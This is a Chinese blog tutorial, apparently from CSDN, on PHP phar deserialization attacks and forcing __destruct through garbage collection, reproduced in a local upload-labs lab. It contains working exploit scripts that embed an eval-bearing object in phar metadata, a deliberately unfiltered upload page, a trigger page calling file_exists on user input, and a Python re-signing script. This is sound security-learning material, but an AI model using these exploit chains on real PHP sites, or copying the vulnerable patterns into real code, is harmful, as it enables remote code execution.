【phar反序列化与GC回收机制的利用】

已于 2022-06-29 08:32:41 修改
阅读量1.1k 收藏 1
点赞数 2
文章标签: web安全 php 安全
于 2022-06-28 22:31:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63016174/article/details/125499990
版权

认识phar

phar是什么?简单来说就是把php压缩而成的打包文件,无需解压,可以通过phar://协议直接读取内容 ,大多数PHP文件操作允许使用各种URL协议去访问文件路径:如data://zlib://php://phar://也是流包装的一种,

phar结构由 4 部分组成

  • stub phar 文件标识,格式为 xxx<?php xxx; __HALT_COMPILER();?>;

  • manifest 压缩文件的属性等信息,以序列化存储;

  • contents 压缩文件的内容;

  • signature 签名,放在文件末尾;

注意:要将php.ini中的phar.readonly选项设置为Off,否则无法生成phar文件。

[Phar] 

;phar.readonly = On 首先在php.ini中修改phar.readonly这个选项,去掉前面的分号,并改值为off,由于安全原因该选项默认是on,如果在php.ini中是禁用的(值为0或off),那么在用户脚本中可以开启或关闭,如果在php.ini中是开启的,那么用户脚本是无法关闭的,所以这里设置为off来展示示例。

下面是php代码构造一个phar文件

$phar = new Phar("phar1.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($O); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering(); ?>

二. PHAR文件结构

Phar文件主要包含三至四个部分:

1.a stub stub的基本结构:xxx<?php xxx;__HALT_COMPILER();?>,前面内容不限,可以在前面加上GIF89a,伪造成gif,jpg;但必须以__HALT_COMPILER();?>来结尾,否则phar扩展将无法识别这个文件为phar文件。

2.Phar文件中被压缩的文件的一些信息,其中Meta-data部分的信息会以序列化的形式储存,这里就是漏洞利用的关键点 生成phar文件

<?php
class A{
    public $code = 'phpinfo();';
    function __destruct()
    {
        eval($this -> output);
    }
}
$object = new A();
$phar = new Phar('phar.phar');
$phar -> startBuffering();
$phar -> setStub('<?php __HALT_COMPILER();?>');
$phar -> setMetadata($object);
$phar -> addFromString('test.txt','test');
$phar -> stopBuffering();

生成的phar文件放入010Editor

没有经过 serialize但是反序列化已经生成,可以明显的看到meta-data是以序列化的形式存储的。

官方手册

phar的本质是一种压缩文件,其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data,这是上述攻击手法最核心的地方

3.有序列化数据必然会有反序列化操作,php一大部分的文件系统函数在通过phar://伪协议解析phar文件时,都会将meta-data进行反序列化,测试后受影响的函数如下:

Stream API是PHP中一种统一的处理文件的方法,并且其被设计为可扩展的,允许任意扩展作者使用 ,仅仅是知道一些受影响的函数,就够了吗?为什么就可以使用了呢?请移步这里

复现phar反序列化漏洞

环境windows,php7.4.3,在upload-labs靶场目录下完成

构造上传页面 up.php 无任何过滤

//php脚本开始
<?
$action=$_POST['action'];
if($action=="submit"){
 $uploaddir = './';//上传的文件保存在当前目录
 $uploadfile = $uploaddir . basename($_FILES['fileField']['name']);//取得PHP上传文件名
 //开始移动PHP上传的临时文件到当前目录下
 if (move_uploaded_file($_FILES['fileField']['tmp_name'], $uploadfile)) {
  echo "上传成功.\n";
 } else {
  echo "上传失败!\n";
 } 
 //打印你用PHP上传成功的文件信息!
 print_r($_FILES);
 exit;//结束php上传进程
}
?>
<form action="" method="post" enctype="multipart/form-data" name="form1" id="form1">
<input name="action" type="hidden" value="submit" />
  <p>
    <input type="file" name="fileField" id="fileField" />
</p>
  <p>
    <input type="submit" name="button" id="button" value="提交" />
</p>
</form>

 执行页面 phar.php

<?php
if (isset($_GET['data'])){

$filename=$_GET['data'];
class AnyClass{
    var $output = 'echo "ok";';
    function __destruct()
    {
        eval($this -> output);
    }
}
file_exists($filename);//触发点
}

else{
    highlight_file(__FILE__);
}
//throw new Error("start");
?>

构造exp

<?php
class AnyClass{
    var $output = 'phpinfo();';
    function __destruct()
    {
        eval($this -> output);
    }
}
$object = new AnyClass();
$phar = new Phar('phar.phar');
$phar -> startBuffering();
$phar -> setStub('<?php __HALT_COMPILER();?>');
$phar -> setMetadata($object);
$phar -> addFromString('test.txt','test');
$phar -> stopBuffering();

上传前修改后缀名为.jpg(由于没有过滤 后缀名可任意修改,这里改成jpg)

测试结果

 由于phar://shell.xxx不限制后缀名,可以应用长度限制上传;敏感字符过滤(zip···)限制文件类型(jpg gif png···)等多种场合;

如果没有上传界面,要求上传字符串,可以用python先读取文件再发包。

GC回收机制的利用

PHP Garbage Collection简称GC,又名垃圾回收,在PHP中使用引用计数和回收周期来自动管理内存对象的

__dustruct 执行条件

1:对象为null
2:生命周期结束的时候
3:当一个对象被unset (GC)

讲魔术方法时就提到过一个问题,__destruct()无论如何都会被触发,但是前提是必须得完成程序的开始与结束,但是如果程序走了一半,突然报错,那么__destruct()不会触发了,那如果又必须要__destruct()触发又得怎么搞呢?
 

如上面的phar.php 需要执行AnyClass类中的__destruct()方法才可以命令执行

如果末尾加上throw new Error("start");

因为抛出异常,程序直接报错而没有执行_destruct(),造成所构造的pop链变的无效。

一些数据或者说是变量在进行某些操作后被置为空(NULL)或者是没有地址(指针)的指向,这种数据一旦被当作垃圾回收后就相当于把一个程序的结尾给划上了句号,那么就可以执行__destruct()方法了

对exp进行修改

<?php
class AnyClass{
    var $output = 'phpinfo();';
    function __destruct()
    {
        eval($this -> output);
    }
}
$object = new AnyClass();
$c=array(0=>$object,1=>NULL);
$phar = new Phar('exp.phar');
$phar -> startBuffering();
$phar -> setStub('<?php __HALT_COMPILER();?>');
$phar -> setMetadata($c);
$phar -> addFromString('test.txt','test');
$phar -> stopBuffering();?>

可以看到新生成的$c有两个键,分别指向$object与NULL

联想到对象指针置换为NULL触发GC回收,在010Editor修改,注意必须修改16进制;

 然后修改签名

from hashlib import sha1
f = open('./exp.phar', 'rb').read() # 修改内容后的phar文件
s = f[:-28] # 获取要签名的数据
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s+sha1(s).digest()+h # 数据 + 签名 + 类型 + GBMB
open('exp.phar', 'wb').write(newf) # 写入新文件

再次上传,url访问。

 测试成功

参考:重新认识反序列化-Phar (lmxspace.com)

浅谈PHP中GC回收机制的利用_errorr0的博客-CSDN博客

admire@
关注
mysql 反序列化函数_phar反序列化
weixin_42529544的博客
01-21 1019
phar反序列化前段时间纵横杯遇到一题反序列化,当时队友做出来了,赛后尝试复现一下,并总结反序列化内容phar的本质是一种压缩文件,会以序列化的形式存储用户自定义的meta-dataPhar文件结构stub:phar文件标识,以 __HALT_COMPILER();?>结尾manifest:压缩文件的属性等信息,以序列化的形式存储自定义的meta-datacontents:压缩文件的内容si...
PHP phar反序列化
weixin_55190422的博客
09-23 633
以题为例 进来后我们注册一个账户并登录 查看一下网页源代码发,并没有发现什么我们上传个文件看看能不能通过菜刀获取权限 发现并不能连接上。此时我们通过BP抓包看看能不能获取到有用的信息 发现一个filename裸露在我们视野我们考虑让filename=xxx.php获取到index.php 我们这样尝试发现没用这是为啥呢?这里有个细节我们一般上传文件都是在网站主目录下的,所以这里需要跳转到上级目录所以我们需要让filename=../../index.php 出现了index.
浅谈PHPGC回收机制利用
errorr0
03-16 2367
GC回收机制,在ctf中不会单独涉及,但是会糅合起来一起考!
phar反序列化+强制GC
qq_53460654的博客
12-14 1749
<?php highlight_file(__FILE__); class getflag { function __destruct() { echo getenv("FLAG"); } } class A { public $config; function __destruct() { if ($this->config == 'w') { $data = $_POST[0];
万能序列,反序列化
Mark
03-22 879
序列化: public static string XmlSerializer(T serialObject) where T : class        {            XmlSerializer xmlSerializer = new XmlSerializer(typeof(T));            System.IO.MemoryStream memmor
JVM 学习(一)反射、垃圾回收、异常处理--- 2019年4月
dbfvilrzf713604323的博客
04-10 143
1、JVM 基础知识点   JVM 虚拟机包含了:自动内存管理器、垃圾回收(垃圾回收调优)。   执行顺序:Java 代码 --- .class 字节码文件(加载到虚拟机中) --- Java 类放在方法区中。   当执行一个 Java 方法时,Java 方法 --- 栈帧(Java 方法栈,存放局部变量/字节码的操作数栈、动态链接、方法出口等) --- 退出方法,弹出栈帧(无论方...
PHP 垃圾回收机制(GC)
Aiwin的博客
10-30 3554
PHP 垃圾回收机制(GC)和例题。
记一道CTF中的phar反序列化
qq_53886354的博客
08-14 2431
通过config的值去控制文件读写, 审计一下正则发现基本上把伪协议都过滤了, 直接new getflag也不行,这种情况下十六进制类名也绕不了,再仔细审计一下发现虽然phar伪协议没有作限制。这一块实在是没什么思路去绕过, 于是参考了一下xenny和atao两位师傅的wp, 此处用的是xenny师傅的思路, 修改文件内容 -> 签名修复 -> 文件上传。, 大致原理就是用其他的压缩格式再对phar文件进行压缩达到混淆的效果, 部分压缩格式混淆过的phar内容同样可以直接被phar://伪协议解析。....
thinkphp5.1.37 可以读写文件 利用phar反序列化
weixin_45805993的博客
11-29 966
安洵杯一道题…一开始根本没想到用phar…还是太菜了 tp版本5.1.37TLS 源码 <?php namespace app\index\controller; use think\Controller; class Index extends controller { public function index() { return '<style type="text/css">*{ padding: 0; margin: 0; } div{ pad
利用PHAR协议进行PHP反序列化攻击1
08-03
PHP反序列化攻击利用PHAR协议详解】 PHP反序列化攻击是一种常见的安全漏洞利用方式,其中PHARPhp ARchive)协议是这类攻击的一个关键路径。PHARPHP中用于打包和分发代码的机制,类似于Java的JAR文件。在...
关于php----phar伪协议和phar文件反序列化漏洞利用
m0_62107966的博客
09-12 2118
关于php----phar伪协议和phar文件反序列化漏洞利用pharphp archive)含义为php 归档文件。如果一个由多个文件构成的php应用程序,可以合并打包为一个文件夹,类似于javaweb项目里的jar文件的话,对于程序员来说是很方便的。在PHP5.3之后支持了类似Java的jar包,名为phar。用来将多个PHP文件打包为一个文件。要生成phar文件的话也是很方便,不需要借助额外的工具来创建或者使用,通过php脚本运行就自动在该脚本所在目录下自动创建。
反序列化漏洞详解
qq_48904485的博客
03-21 3735
一、基础知识 1、序列化 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,序列化的目的是方便数据的传输和存储。在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的序列化格式: 二进制格式 字节数组 json字符串 xml字符串 比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s
原型链污染攻击
errorr0
04-30 679
前端漏洞
『踩坑记录』PHP-使用ini_set()无法修改phar.readonly
Ho1aAs‘s Blog
09-03 2164
phar.readonly因安全因素只能在php.ini中修改,使用ini_set无法修改
PHP phar详解
LPL_hacker的博客
10-14 4293
phar文件是什么 Jar(Java Archive)文件,一个应用,包括所有的可执行,可访问的文件,都打包进了一个JAR文件里,使得部署过程十分简单。 类似于JAR。phar全称为PHP Archive,phar扩展提供了一种将整个PHP应用程序放入.phar文件中的方法,以方便移动、安装。phar文件的最大特点是将几个文件组合成一个文件的便捷方式。.phar文件提供了一种将完整的PHP程序分布在一个文件中并从该文件中运行的方法。 与 JAR ...
disabled by the php.ini setting phar.readonly
weixin_34004750的博客
09-18 3005
2019独角兽企业重金招聘Python工程师标准>>> ...
phar的创建与使用
onlymayao的博客
01-10 1183
名词解释 如果你之前开发过Java程序,我相信你肯定知道Jar文件(Jar是Java ARchive的缩写)。一个应用,包括所有的可执行、可访问的文件,都打包进了一个JAR文件里,使得部署过程十分简单。 PHAR (“Php ARchive”) 是PHP里类似于JAR的一种打包文件。如果你使用的是 PHP 5.3 或更高版本,那么Phar后缀文件是默认开启支持的,你不需要任何其他的安装就可以使用它...
Phar反序列化漏洞原理
soldi_er的博客
06-08 610
文章目录   来自Secarma的安全研究员Sam Thomas发现,可以在不使用php函数unserialize()的前提下,引起严重的php对象注入漏洞。   
使用php -phar来理解composer
02-15 125
1. phar是何方神圣? 我们知道C#可以把代码打包成dll文件,java可以打包成jar, 而phar就是php的打包工具,可以将多个php文件打包成一个文件。 首先需要修改php.ini配置将phar的readonly关闭,默认是不能写phar包的,include是默认开启的。 ...
phar反序列化poc
最新发布
05-21
Phar反序列化漏洞是指攻击者利用PHP中的Phar文件解析器对不受信任数据进行反序列化攻击的一种安全漏洞。攻击者可以通过构造特定的Phar文件,触发解析器反序列化恶意代码,从而实现远程代码执行。 一个简单的Phar反序列化POC如下: ``` <?php class Example { public $command; } $phar = new Phar('phar.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $example = new Example(); $example->command = 'echo "Hello World";'; $phar->setMetadata($example); $phar->stopBuffering(); include 'phar://phar.phar/test.txt'; ?> ``` 上述POC中,攻击者创建了一个含有恶意代码的Phar文件,并将其反序列化到`$example`变量中,最后通过`include`语句触发远程代码执行。 相关问题: 1. 什么是Phar文件? 2. 什么是反序列化漏洞? 3. 如何防范Phar反序列化漏洞?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值